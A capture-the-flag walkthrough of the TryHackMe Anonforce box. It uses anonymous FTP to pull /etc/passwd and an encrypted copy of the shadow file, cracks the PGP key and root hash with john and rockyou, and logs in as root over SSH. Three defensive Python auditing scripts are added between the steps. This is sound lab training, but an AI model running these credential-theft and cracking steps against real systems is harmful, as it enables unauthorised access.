TryHackMe Anonforce Writeup

This writeup will help you solve the TryHackMe Anonforce box. Before we start enumerating the box, add the following line to your /etc/hosts file.

echo "<box_ip>   anonforce.thm" >> /etc/hosts

TryHackMe Anonforce – Enumeration

We start by checking which ports are open on the server. To do so we use a tool called nmap. Now run the command listed below:

nmap -sV -sC anonforce.thm

The -sV flag probes each open port for service and version information, and -sC runs nmap's default script set against the target. The output can be seen below:

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
| drwxr-xr-x   17 0        0            3700 Jan 05 12:48 dev
| drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
| drwx------    2 0        0           16384 Aug 11  2019 lost+found
| drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
| drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
| drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread [NSE: writeable]
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
| dr-xr-xr-x  101 0        0               0 Jan 05 12:48 proc
| drwx------    3 0        0            4096 Aug 11  2019 root
| drwxr-xr-x   18 0        0             540 Jan 05 12:48 run
| drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
| drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
| dr-xr-xr-x   13 0        0               0 Jan 05 12:48 sys
| drwxrwxrwt    9 0        0            4096 Jan 05 12:48 tmp [NSE: writeable]
| drwxr-xr-x   10 0        0            4096 Aug 11  2019 usr
| drwxr-xr-x   11 0        0            4096 Aug 11  2019 var
| lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
|_lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.8.169
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDkGQ8G5TDLFJY+zMp5dEj6XUwoH7ojGBjGkOmAf6d9PuIsf4DPFJQmoCA/eiSZpIwfQ14hVhXJHTclmcCd+2OeriuLXq0fEn+aHTo5X82KADkJibmel86qS7ToCzcaROnUkJU17mY3MuyTbfxuqmSvTv/7NI0zRW+cJ+cqwmeSZyhLnOHZ9GT5Y3Lbpvt2w0ktQ128POyaO4GrGA0EERWstIxExpqLaLsqjQPE/hBnIgZXZjd6EL1gn1/CSQnJVdLesIWMcvT5qnm9dZn/ysvysdHHaHylCSKIx5Qu9LtsitssoglpDlhXu5kr2do6ncWMAdTW75asBh+VE+QVX3vV
|   256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAq1VuleOFZpJb73D/25H1l0wp9Cs/SGwWIjwtGW0/2/20+xMsac5E8rACtXtLaAuL3Dk/IRSrORuEfU11R0H3A=
|   256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIiId/YCdJZgD4/DG314U2CpAu8Y13DAx7AQ+JX+3zVc
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Ports 21 and 22 are open. An FTP server (vsftpd 3.0.3) is running on port 21 and anonymous users are allowed to log in; the listing nmap retrieved is the filesystem root, with notread and tmp flagged as writeable. The other service, on port 22, is an SSH server. It seems like we are able to get the user flag right away! Log into the FTP server by running the following commands:

ftp anonforce.thm
anonymous
anonymous
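As an added, defender-side example (not part of the original writeup), here is a small Python parser that reads the ftp-anon section of an nmap scan like the one above and reports what matters for triage: whether anonymous login is allowed, which directories are writeable, and whether the listing looks like the filesystem root. The sample input is a constructed excerpt of the scan output shown above.

```python
import re

# Constructed excerpt of the nmap ftp-anon output shown above (a few of its lines).
SAMPLE_NMAP = """\
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
| drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
| drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread [NSE: writeable]
| drwx------    3 0        0            4096 Aug 11  2019 root
| drwxrwxrwt    9 0        0            4096 Jan 05 12:48 tmp [NSE: writeable]
|_lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
| ftp-syst:
"""

# Names that only make sense at the filesystem root; several of them in an anonymous
# listing means the whole system is being served, as on this box.
ROOT_MARKERS = {"bin", "boot", "etc", "root", "sbin", "usr", "var", "proc"}

# One ls-style listing line as nmap prints it: perms links uid gid size mon day time/year name [extra]
LISTING_RE = re.compile(
    r"^\|_?\s*([dl-][rwxstT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+[\d:]+\s+(\S+)(.*)$"
)


def parse_ftp_anon(nmap_output):
    """Summarise the ftp-anon script block as a dict of risk indicators."""
    result = {"anonymous_allowed": False, "entries": [], "writeable": [], "root_exposed": False}
    in_listing = False
    for line in nmap_output.splitlines():
        if "ftp-anon:" in line:
            in_listing = "Anonymous FTP login allowed" in line
            result["anonymous_allowed"] = in_listing
            continue
        if not in_listing:
            continue
        m = LISTING_RE.match(line)
        if not m:
            in_listing = False  # a different NSE script starts here
            continue
        perms, name, extra = m.groups()
        result["entries"].append(name)
        # nmap tags writeable dirs itself; the world-write bit on a directory is the fallback
        if "[NSE: writeable]" in extra or (perms[0] == "d" and perms[8] == "w"):
            result["writeable"].append(name)
    result["root_exposed"] = len(ROOT_MARKERS & set(result["entries"])) >= 3
    return result
```

Run it over a full `nmap -sV -sC` report and any host with `root_exposed` set is serving its whole filesystem to anonymous clients, which is exactly the misconfiguration this box is built on.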

TryHackMe Anonforce – User Flag

Now to get the user.txt flag you can check the following console snippet and run the commands yourself!

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd home
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Aug 11  2019 melodias
226 Directory send OK.
ftp> cd melodias
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000           33 Aug 11  2019 user.txt
226 Directory send OK.
ftp> mget user.txt
mget user.txt? Y
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for user.txt (33 bytes).
226 Transfer complete.

Now, on your local machine, run cat user.txt to read the user flag.

TryHackMe Anonforce – Root Flag

Another interesting entry in the / listing is the notread directory (the one nmap flagged as writeable). Get all the files within this directory by running:

cd /notread
mget *

You should now have downloaded both the backup.pgp file and the private.asc file. It seems like the private.asc file is a key for the encrypted backup.pgp file. We can try to decrypt the file with the given key. To do so run:

gpg --import private.asc

This, however, will not succeed: the secret PGP key is protected by a passphrase. Luckily we can use the tools provided by openwall.com to crack it. Within Kali Linux the John the Ripper toolset is already installed, and it contains several hash converters. We can convert the PGP key to a crackable hash by running:

gpg2john private.asc > hash

Now crack the hash by running:

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Which gives the following output:

*******          (anonforce)

Nice, we found the password! We are now able to decrypt the backup file. Run the following command to get the content of this file:

gpg --decrypt backup.pgp

The output is:

root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18120:0:99999:7:::
uuidd:*:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
ftp:*:18120:0:99999:7:::
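Added example, not from the original writeup: a shadow-file audit in Python that classifies each account's hash scheme, such as the md5crypt ($1$) hash of melodias beside the sha512crypt ($6$) hash of root above, and flags empty, legacy DES and md5crypt entries for attention. The sample input is a constructed excerpt of the decrypted file shown above.

```python
# Constructed excerpt of the decrypted backup.pgp (the system's shadow file) shown above.
SAMPLE_SHADOW = """\
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17953:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
"""

# crypt(3) scheme identifiers -> (name, weak). md5crypt and descrypt are cheap to attack
# with a wordlist; the others are slower per guess but still fall to a dictionary password.
SCHEMES = {
    "1": ("md5crypt", True),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "y": ("yescrypt", False),
    "2b": ("bcrypt", False),
}

def classify_hash(field):
    """Return (scheme, weak, locked) for the second field of a shadow entry."""
    if field == "":
        return ("empty", True, False)          # no password needed at all
    if field.startswith(("*", "!")):
        return ("locked", False, True)         # no usable password hash
    if not field.startswith("$"):
        return ("descrypt", True, False)       # legacy 13-char DES crypt
    ident = field.split("$")[1]
    name, weak = SCHEMES.get(ident, ("unknown$" + ident, False))
    return (name, weak, False)

def audit_shadow(text):
    """Parse shadow-format lines into one finding per account."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        scheme, weak, locked = classify_hash(field)
        findings.append({"user": user, "scheme": scheme, "weak": weak, "locked": locked})
    return findings

def weak_accounts(text):
    """Users whose hash scheme (or lack of one) needs attention first."""
    return [f["user"] for f in audit_shadow(text) if f["weak"]]

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f['user']:10} {f['scheme']:12} weak={f['weak']} locked={f['locked']}")
```

A stronger scheme only slows each guess: as the rest of this writeup shows, root's sha512crypt hash still falls to rockyou because the password itself is in the wordlist.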

Cracking the root hash

The decrypted file is the system's /etc/shadow, and we can see the password hashes of both the melodias and the root user in it. To prepare them for cracking we use John's unshadow utility, which merges /etc/passwd and /etc/shadow into a single file. Save the decrypted output above to a file named shadow, then log into the FTP server again and get the /etc/passwd file.

ftp anonforce.thm
anonymous
anonymous
cd /etc/
mget passwd

Now run:

unshadow passwd shadow > ssh_hash

Now use john again to crack the hash.

john ssh_hash --wordlist=/usr/share/wordlists/rockyou.txt

After a short while John should find the root password. Use it to log into the server over SSH:

ssh root@anonforce.thm

The root flag is located at /root/root.txt.

This was a fun box to root! To run a safe FTP server you should disable anonymous login. Furthermore, you should never expose the root directory of the system over FTP: doing so gives an attacker access to all the files on the system.
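To make the closing advice concrete, here is an added example (not from the original writeup) that audits a vsftpd.conf for the settings behind this box's exposure, with a weak fragment beside its hardened counterpart. Both configuration fragments are constructed; `anonymous_enable`, `anon_root`, `write_enable`, `anon_upload_enable`, `local_enable` and `chroot_local_user` are real vsftpd directives, and the check assumes the anonymous root is set through `anon_root` (when it is unset, the ftp account's home directory decides, which the script can only flag for manual review).

```python
# Constructed vsftpd.conf fragments: the first reproduces the exposure this box shows
# (anonymous login landing in /), the second is the hardened counterpart.
WEAK_CONF = """\
anonymous_enable=YES
anon_root=/
local_enable=YES
write_enable=YES
anon_upload_enable=YES
"""

HARDENED_CONF = """\
anonymous_enable=NO
local_enable=YES
write_enable=NO
chroot_local_user=YES
"""

def parse_conf(text):
    """vsftpd.conf is one key=value per line; '#' starts a comment."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def is_yes(conf, key, default):
    """Boolean directive, using vsftpd's compiled-in default when the key is absent."""
    return conf.get(key, default).upper() == "YES"

def audit_vsftpd(text):
    """Return (directive, problem) pairs for the settings this box was compromised through."""
    conf = parse_conf(text)
    issues = []
    if is_yes(conf, "anonymous_enable", "YES"):        # vsftpd's own default is YES
        issues.append(("anonymous_enable", "anonymous login allowed; set to NO"))
        root = conf.get("anon_root")
        if root is None:
            issues.append(("anon_root", "unset: the ftp account's home directory is served, verify it is not /"))
        elif root.rstrip("/") == "":
            issues.append(("anon_root", "anonymous users are served the filesystem root"))
        if is_yes(conf, "write_enable", "NO") and is_yes(conf, "anon_upload_enable", "NO"):
            issues.append(("anon_upload_enable", "anonymous users may upload files"))
    if is_yes(conf, "local_enable", "NO") and not is_yes(conf, "chroot_local_user", "NO"):
        issues.append(("chroot_local_user", "local users can browse outside their home directory"))
    return issues
```

Point `audit_vsftpd` at the contents of /etc/vsftpd.conf on a server you maintain; an empty result means none of the settings exploited in this writeup are present.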
